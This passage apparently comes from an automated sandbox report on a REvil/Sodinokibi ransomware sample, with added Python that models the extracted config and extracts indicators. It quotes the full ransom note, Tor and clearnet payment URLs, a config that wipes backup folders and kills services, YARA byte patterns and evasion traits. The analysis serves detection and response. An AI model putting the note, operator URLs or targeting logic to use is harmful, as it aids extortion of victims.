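    # Constructed excerpt of "dmn"; the page's list repeats hosts such as
    # iwelt.de and mank.de, which is why unique_domains() deduplicates.
    "dmn": "notmissingout.com;employeesurveys.com;iwelt.de;sw1m.ru;iwelt.de;mank.de;mank.de",
    "wipe": True,
    "wfld": ["backup"],
    "nname": "{EXT}-readme.txt",
    "pk": "PcGaG/OPoFiNzu1LUC2Qhz905YYQChX9SFo+MuXEV2M=",
    "net": False,
}


def decode_wallpaper(img_b64: str) -> str:
    """The "img" field is base64 of a NUL-terminated UTF-16LE string."""
    raw = base64.b64decode(img_b64)
    return raw.decode("utf-16-le").rstrip("\x00")


def _components(path: str):
    """Lower-cased folder components and file name of a Windows path."""
    _drive, rest = ntpath.splitdrive(path)
    parts = [p for p in rest.replace("/", "\\").split("\\") if p]
    folders = [p.lower() for p in parts[:-1]]
    name = parts[-1].lower() if parts else ""
    return folders, name


def classify_path(path: str, cfg: dict = CONFIG) -> str:
    """Return "skip", "wipe" or "encrypt" for a path.

    Assumption: whitelist entries are compared case-insensitively, folder
    names as whole path components, and the whitelist wins over "wfld".
    """
    folders, name = _components(path)
    wht = cfg["wht"]
    if any(f in wht["fld"] for f in folders) or name in wht["fls"]:
        return "skip"
    ext = name.rsplit(".", 1)[1] if "." in name else ""
    if ext in wht["ext"]:
        return "skip"
    if cfg.get("wipe") and any(f in cfg.get("wfld", []) for f in folders):
        return "wipe"
    return "encrypt"


def kill_targets(process_name: str, cfg: dict = CONFIG) -> bool:
    """Assumption: "prc" entries are substrings of the image name without
    its extension, so "sql" covers sqlservr.exe and sqlwriter.exe."""
    stem = process_name.lower().rsplit(".", 1)[0]
    return any(p in stem for p in cfg["prc"])


def service_targets(service_name: str, cfg: dict = CONFIG) -> bool:
    """Same substring assumption for the "svc" list (veeam, vss, backup, ...)."""
    name = service_name.lower()
    return any(s in name for s in cfg["svc"])


def unique_domains(dmn: str) -> list:
    """Split the ';'-separated "dmn" field into a sorted, de-duplicated list.
    With "net": false in this config the sample is not expected to contact
    them, so treat them as weak indicators rather than live C2."""
    seen = []
    for d in dmn.split(";"):
        d = d.strip().lower()
        if d and d not in seen:
            seen.append(d)
    return sorted(seen)


def public_key_bytes(pk_b64: str) -> bytes:
    """"pk" decodes to 32 bytes, the size of a Curve25519 public key."""
    return base64.b64decode(pk_b64)


def triage(cfg: dict = CONFIG) -> dict:
    return {
        "wallpaper_text": decode_wallpaper(cfg["img"]),
        "note_name": cfg["nname"],
        "domains": unique_domains(cfg["dmn"]),
        "pk_len": len(public_key_bytes(cfg["pk"])),
        "beacons": cfg.get("net", False),
    }


if __name__ == "__main__":
    for k, v in triage().items():
        print(f"{k}: {v!r}")
    for p in (r"C:\Users\user\Documents\report.docx",
              r"C:\Windows\System32\kernel32.dll",
              r"D:\Shares\backup\db.bak"):
        print(p, "->", classify_path(p))
```

The decoded "img" text keeps the spelling "instuctions" exactly as the config carries it, which is itself a usable string indicator. A path under a whitelisted folder or with a whitelisted extension is skipped before anything else; only a non-whitelisted file inside a "backup" folder reaches the wipe branch under the modelled ordering.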
Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
Sample_5fba9b06c7da400016eb6275.exe | MAL_RANSOM_REvil_Oct20_1 | Detects REvil ransomware | Florian Roth
  • 0x4d44:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
  • 0x99c6:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
  • 0x9fb2:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
  • 0x91eb:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
  • 0x99b5:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.348277768.0000000002B4F000.00000004.00000040.sdmp | JoeSecurity_Sodinokibi | Yara detected Sodinokibi Ransomware | Joe Security
00000000.00000003.348165108.0000000002B4F000.00000004.00000040.sdmp | JoeSecurity_Sodinokibi | Yara detected Sodinokibi Ransomware | Joe Security
00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp | MAL_RANSOM_REvil_Oct20_1 | Detects REvil ransomware | Florian Roth
  • 0x4944:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
  • 0x95c6:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
  • 0x9bb2:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
  • 0x8deb:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
  • 0x95b5:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F
00000000.00000000.347800253.00000000009B1000.00000020.00020000.sdmp | MAL_RANSOM_REvil_Oct20_1 | Detects REvil ransomware | Florian Roth
  • 0x4944:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
  • 0x95c6:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
  • 0x9bb2:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
  • 0x8deb:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
  • 0x95b5:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F
Process Memory Space: Sample_5fba9b06c7da400016eb6275.exe PID: 7020 | JoeSecurity_Sodinokibi | Yara detected Sodinokibi Ransomware | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
0.0.Sample_5fba9b06c7da400016eb6275.exe.9b0000.0.unpack | MAL_RANSOM_REvil_Oct20_1 | Detects REvil ransomware | Florian Roth
  • 0x4d44:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
  • 0x99c6:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
  • 0x9fb2:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
  • 0x91eb:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
  • 0x99b5:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F
0.2.Sample_5fba9b06c7da400016eb6275.exe.9b0000.1.unpack | MAL_RANSOM_REvil_Oct20_1 | Detects REvil ransomware | Florian Roth
  • 0x4d44:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
  • 0x99c6:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
  • 0x9fb2:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
  • 0x91eb:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
  • 0x99b5:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F

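The same five $op strings hit at 0x4d44, 0x99c6, 0x9fb2, 0x91eb and 0x99b5 in the submitted file and in both unpacked PEs, and at 0x4944, 0x95c6, 0x9bb2, 0x8deb and 0x95b5 in the two dumps taken at 0x9B1000. The following added example (not part of the report, of Joe Security's tooling, or of the rule author's code) rebuilds those strings from the tables, checks that the two offset sets differ by one constant, maps both back to a virtual address, and scans a constructed buffer with them. The PE layout it assumes (first code section at raw offset 0x400 and RVA 0x1000, image base 0x9B0000 as the "9b0000.*.unpack" names suggest) is an assumption; the PE headers that would confirm it are not on the page.

```python
"""Cross-check of the MAL_RANSOM_REvil_Oct20_1 string hits quoted on this page.

Added example, not part of the report. Offsets and bytes are copied from the
YARA tables; the PE layout constants are assumptions, not page data.
"""

# name -> (file/unpack offset, memory-dump offset, bytes) as the tables list them
OP_STRINGS = {
    "$op1": (0x4D44, 0x4944, "0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B"),
    "$op2": (0x99C6, 0x95C6, "8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF"),
    "$op3": (0x9FB2, 0x9BB2, "89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84"),
    "$op4": (0x91EB, 0x8DEB, "8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF"),
    "$op5": (0x99B5, 0x95B5, "8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F"),
}

# Assumed layout (not on the page): code section raw 0x400 / RVA 0x1000,
# image base 0x9B0000; the dumps start at 0x9B1000.
SECTION_RAW, SECTION_RVA, IMAGE_BASE = 0x400, 0x1000, 0x9B0000
DUMP_BASE = 0x9B1000


def pattern(name: str) -> bytes:
    return bytes.fromhex(OP_STRINGS[name][2])


def offset_delta():
    """File offset minus dump offset, if identical for all five strings.

    One constant means the dumped code is the on-disk code at a fixed shift;
    differing deltas would point at a runtime unpacker or relocated code."""
    deltas = {f - m for f, m, _ in OP_STRINGS.values()}
    return deltas.pop() if len(deltas) == 1 else None


def dump_offset_to_va(off: int) -> int:
    return DUMP_BASE + off


def file_offset_to_va(off: int) -> int:
    """Under the assumed layout raw offset 0x400 maps to RVA 0x1000."""
    return IMAGE_BASE + SECTION_RVA + (off - SECTION_RAW)


def scan(buf: bytes) -> dict:
    """Every offset at which each $op string occurs in buf (plain substring
    search over the rule's strings; the rule's condition is not reproduced)."""
    hits = {}
    for name in OP_STRINGS:
        pat = pattern(name)
        found = []
        i = buf.find(pat)
        while i != -1:
            found.append(i)
            i = buf.find(pat, i + 1)
        hits[name] = found
    return hits


def build_dump_like_buffer(size: int = 0xA000) -> bytes:
    """Constructed stand-in for the 0x9B1000 dump: each string placed at its
    dump offset, zeros elsewhere. This is not the sample's memory."""
    buf = bytearray(size)
    for name, (_, mem_off, _) in OP_STRINGS.items():
        pat = pattern(name)
        buf[mem_off:mem_off + len(pat)] = pat
    return bytes(buf)


if __name__ == "__main__":
    print("file - dump delta:", hex(offset_delta()))
    for name, (f_off, m_off, _) in OP_STRINGS.items():
        print(name, hex(file_offset_to_va(f_off)), hex(dump_offset_to_va(m_off)))
    print(scan(build_dump_like_buffer()))
```

With the assumed layout every string resolves to the same virtual address from either view ($op1 to 0x9B5944), which is the check worth making before trusting that a memory-dump match and a file match refer to the same code.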
Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Sample_5fba9b06c7da400016eb6275.exe | Avira: detected
Found malware configuration
Source: Sample_5fba9b06c7da400016eb6275.exe.7020.0.memstr | Malware Configuration Extractor: Sodinokibi (the extracted configuration is reproduced in full in the Malware Configuration section above)
        Multi AV Scanner detection for submitted file
        Source: Sample_5fba9b06c7da400016eb6275.exe Virustotal: Detection: 89%
        Source: Sample_5fba9b06c7da400016eb6275.exe Metadefender: Detection: 48%
        Source: Sample_5fba9b06c7da400016eb6275.exe ReversingLabs: Detection: 86%
        Machine Learning detection for sample
        Source: Sample_5fba9b06c7da400016eb6275.exe Joe Sandbox ML: detected
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B549C CryptAcquireContextW,CryptGenRandom 0_2_009B549C
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B5D90 CryptBinaryToStringW,CryptBinaryToStringW 0_2_009B5D90
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B5D2F CryptStringToBinaryW,CryptStringToBinaryW 0_2_009B5D2F
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe File opened: a: through z: (all 26 drive letters, one "File opened" event each)
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B766A FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose 0_2_009B766A

        Networking:

        Found Tor onion address
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000002.577730714.0000000002B58000.00000004.00000040.sdmp String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7014F8C2779026F
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000003.524083890.0000000002B6F000.00000004.00000040.sdmp String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
        Source: su84mu33c1-readme.txt19.0.dr String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7014F8C2779026F
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000003.524083890.0000000002B6F000.00000004.00000040.sdmp String found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000002.577730714.0000000002B58000.00000004.00000040.sdmp, su84mu33c1-readme.txt19.0.dr String found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7014F8C2779026F
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000003.524083890.0000000002B6F000.00000004.00000040.sdmp String found in binary or memory: http://decryptor.cc/
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000002.577730714.0000000002B58000.00000004.00000040.sdmp, su84mu33c1-readme.txt19.0.dr String found in binary or memory: http://decryptor.cc/A7014F8C2779026F
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000002.577730714.0000000002B58000.00000004.00000040.sdmp, Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000003.524083890.0000000002B6F000.00000004.00000040.sdmp, su84mu33c1-readme.txt19.0.dr String found in binary or memory: https://torproject.org/
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000002.573901385.0000000000BBA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

        Spam, unwanted Advertisements and Ransom Demands:

        Found ransom note / readme
        Source: C:\su84mu33c1-readme.txt Dropped file:
            ---=== Welcome. Again. ===---
            [+] Whats Happen? [+]
            Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1.
            By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
            [+] What guarantees? [+]
            Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
            To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
            If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.
            [+] How to get access on website? [+]
            You have two ways:
            1) [Recommended] Using a TOR browser!
              a) Download and install TOR browser from this site: https://torproject.org/
              b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7014F8C2779026F
            2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
              a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
              b) Open our secondary website: http://decryptor.cc/A7014F8C2779026F
            Warning: secondary website can be blocked, thats why first variant muc
        Yara detected Sodinokibi Ransomware
        Source: Yara match File source: 00000000.00000003.348277768.0000000002B4F000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara match File source: 00000000.00000003.348165108.0000000002B4F000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: Sample_5fba9b06c7da400016eb6275.exe PID: 7020, type: MEMORY
        Modifies existing user documents (likely ransomware behavior)
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe File moved: C:\Users\user\Desktop\ZTGJILHXQB\QCFWYSKMHA.png
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe File deleted: C:\Users\user\Desktop\ZTGJILHXQB\QCFWYSKMHA.png
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe File moved: C:\Users\user\Desktop\UOOJJOZIRH.xlsx
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe File deleted: C:\Users\user\Desktop\UOOJJOZIRH.xlsx
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe File moved: C:\Users\user\Desktop\PWCCAWLGRE.jpg
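The note and the memory strings above carry the indicators a responder needs: the victim-specific path component (the 16 hex characters after the .onion/ and decryptor.cc/ hosts, which the in-memory template still shows as {UID}), the extension appended to encrypted files, and the note file name derived from it. The following Python is an added example, not part of the report; NOTE_TEXT is an abridged, re-typed copy of the dropped note and TEMPLATE_LINE is the unfilled string from process memory, both embedded so the code runs offline. The field names and regular expressions are this example's own choices.

```python
import re

# Abridged copy of C:\su84mu33c1-readme.txt as quoted in the report (constructed input).
NOTE_TEXT = """---=== Welcome. Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1.
[+] How to get access on website? [+]
1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7014F8C2779026F
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
b) Open our secondary website: http://decryptor.cc/A7014F8C2779026F
"""

# The unfilled template as it sits in process memory before the victim id is substituted.
TEMPLATE_LINE = ("b) Open our website: "
                 "http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}")

# v3 onion hosts are 56 base32 characters; the victim id in this note is 16 upper-case hex digits.
ONION_RE = re.compile(r"https?://([a-z2-7]{56}\.onion)/(?:([0-9A-F]{16})\b)?")
CLEARNET_RE = re.compile(r"https?://(decryptor\.[a-z]{2,})/(?:([0-9A-F]{16})\b)?")
EXT_RE = re.compile(r"has extension ([0-9a-z]{5,10})\.")


def extract_iocs(text):
    """Pull the REvil-specific indicators out of a note or a memory string.
    Missing pieces come back as None rather than raising, so the function can be
    run over partial strings such as the {UID} template."""
    onion = ONION_RE.search(text)
    clearnet = CLEARNET_RE.search(text)
    ext = EXT_RE.search(text)
    uid = (onion and onion.group(2)) or (clearnet and clearnet.group(2)) or None
    return {
        "onion_host": onion.group(1) if onion else None,
        "clearnet_host": clearnet.group(1) if clearnet else None,
        "victim_uid": uid,
        "extension": ext.group(1) if ext else None,
        "note_filename": f"{ext.group(1)}-readme.txt" if ext else None,
        "template": "{UID}" in text,     # True for the unfilled in-memory copy
    }


if __name__ == "__main__":
    for label, text in (("dropped note", NOTE_TEXT), ("memory template", TEMPLATE_LINE)):
        print(label, extract_iocs(text))
```

The victim id is what the operator's portal keys on, so it, the onion host and the extension are the values worth recording per host; the onion host is shared across REvil victims of this period and is a weaker indicator on its own.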
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B3B6E OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle 0_2_009B3B6E
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009BB7A2
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B8AF8
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B85D5
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009BAB0D
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B8377
        Source: Sample_5fba9b06c7da400016eb6275.exe, type: SAMPLE Matched rule: MAL_RANSOM_REvil_Oct20_1 (author = Florian Roth, date = 2020-10-13, description = Detects REvil ransomware, reference = Internal Research, hash1 = 5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4, hash2 = f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5, hash3 = f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d, hash4 = fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501)
        Source: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, type: MEMORY Matched rule: MAL_RANSOM_REvil_Oct20_1 (same rule metadata)
        Source: 00000000.00000000.347800253.00000000009B1000.00000020.00020000.sdmp, type: MEMORY Matched rule: MAL_RANSOM_REvil_Oct20_1 (same rule metadata)
        Source: 0.0.Sample_5fba9b06c7da400016eb6275.exe.9b0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_RANSOM_REvil_Oct20_1 (same rule metadata)
        Source: 0.2.Sample_5fba9b06c7da400016eb6275.exe.9b0000.1.unpack, type: UNPACKEDPE Matched rule: MAL_RANSOM_REvil_Oct20_1 (same rule metadata)
        Source: classification engine Classification label: mal100.rans.evad.winEXE@2/207@0/0
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B4CD4 GetDriveTypeW,GetDiskFreeSpaceExW 0_2_009B4CD4
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B5425 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW 0_2_009B5425
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe File created: c:\program files\su84mu33c1-readme.txt
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe File created: c:\users\su84mu33c1-readme.txt
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\C67C4A76-40FA-FD1C-B814-F8203DB0F283
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe File created: C:\Users\user\AppData\Local\Temp\xa288w44oi.bmp
        Source: Sample_5fba9b06c7da400016eb6275.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\CIMV2 : SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process' (the same query is recorded three times)
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: Sample_5fba9b06c7da400016eb6275.exe Virustotal: Detection: 89%
        Source: Sample_5fba9b06c7da400016eb6275.exe Metadefender: Detection: 48%
        Source: Sample_5fba9b06c7da400016eb6275.exe ReversingLabs: Detection: 86%
        Source: unknown Process created: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe 'C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe'
        Source: unknown Process created: C:\Windows\System32\wbem\unsecapp.exe C:\Windows\system32\wbem\unsecapp.exe -Embedding
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Directory created: c:\program files\su84mu33c1-readme.txt
        Source: Sample_5fba9b06c7da400016eb6275.exe Static PE information: section name: .axh
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009C30F8 pushfd ; ret 0_2_009C30FE
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe File created: su84mu33c1-readme.txt in each of the following directories:
            C:\
            c:\program files
            c:\program files (x86)
            c:\recovery
            c:\users
            c:\program files (x86)\microsoft sql server
            c:\users\default
            c:\users\user
            c:\users\public
            c:\program files (x86)\microsoft sql server\110
            c:\users\default\desktop
            c:\users\default\documents
            c:\users\default\downloads
            c:\users\default\favorites
            c:\users\default\links
            c:\users\default\music
            c:\users\default\pictures
            c:\users\default\saved games
            c:\users\default\videos
            c:\users\user\3d objects
            c:\users\user\contacts
            c:\users\user\desktop
            c:\users\user\documents
            c:\users\user\downloads
            c:\users\user\favorites
            c:\users\user\links
            c:\users\user\music
            c:\users\user\onedrive
            c:\users\user\pictures
            c:\users\user\recent
            c:\users\user\saved games
            c:\users\user\searches
            c:\users\user\videos
            c:\users\public\accountpictures
            c:\users\public\desktop
            c:\users\public\documents
            c:\users\public\downloads
            c:\users\public\libraries
            c:\users\public\music
            c:\users\public\pictures
            c:\users\public\videos
            c:\program files (x86)\microsoft sql server\110\shared
            c:\users\user\desktop\<folder> and c:\users\user\documents\<folder> for each of the twelve sample folders eegwxuhvug, eowrvpqccs, fenivhoikn, gigiytffyt, grxzdkkvdb, mxpxcvpdvn, pwccawlgre, qncycdfijj, uoojjozirh, vamydfpund, wkxewiotxi, ztgjilhxqb
            c:\users\user\favorites\links
            c:\users\user\pictures\camera roll

        Malware Analysis System Evasion:

        Contains functionality to detect sleep reduction / modifications
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B595D
        Found evasive API chain (may stop execution after checking mutex)
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Evasive API call chain: CreateMutex, DecisionNodes, ExitProcess (graph_0-4207)
        Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep (graph_0-5161)
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B58B3 rdtsc 0_2_009B58B3
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle 0_2_009B3B6E
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Window / User API: threadDelayed 10000
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Evasive API call chain: GetModuleFileName, DecisionNodes, ExitProcess (graph_0-4733)
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Check user administrative privileges: GetTokenInformation, DecisionNodes (graph_0-4721)
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe TID: 7024 Thread sleep count: 10000 > 30
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe File Volume queried: C:\ FullSizeInformation
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B766A FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose 0_2_009B766A
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B53F1 GetSystemInfo 0_2_009B53F1
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe API call chain: ExitProcess graph end node (graph_0-4235)
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe API call chain: ExitProcess graph end node (graph_0-4226)
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe API call chain: ExitProcess graph end node (graph_0-4293)
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B58B3 rdtsc 0_2_009B58B3
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B5083 mov eax, dword ptr fs:[00000030h] 0_2_009B5083
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B5408 mov ecx, dword ptr fs:[00000030h] 0_2_009B5408
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B494C HeapCreate,GetProcessHeap 0_2_009B494C
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Process token adjusted: Debug
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: OpenProcess,QueryFullProcessImageNameW,PathFindFileNameW, svchost.exe 0_2_009B4B05
        Source: unsecapp.exe, 0000000E.00000002.616569697.00000176D6E90000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
        Source: unsecapp.exe, 0000000E.00000002.616569697.00000176D6E90000.00000002.00000001.sdmp Binary or memory string: Progman
        Source: unsecapp.exe, 0000000E.00000002.616569697.00000176D6E90000.00000002.00000001.sdmp Binary or memory string: &Program Manager
        Source: unsecapp.exe, 0000000E.00000002.616569697.00000176D6E90000.00000002.00000001.sdmp Binary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B4C25 cpuid 0_2_009B4C25
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe Code function: 0_2_009B5126 GetUserNameW 0_2_009B5126

        Mitre Att&ck Matrix

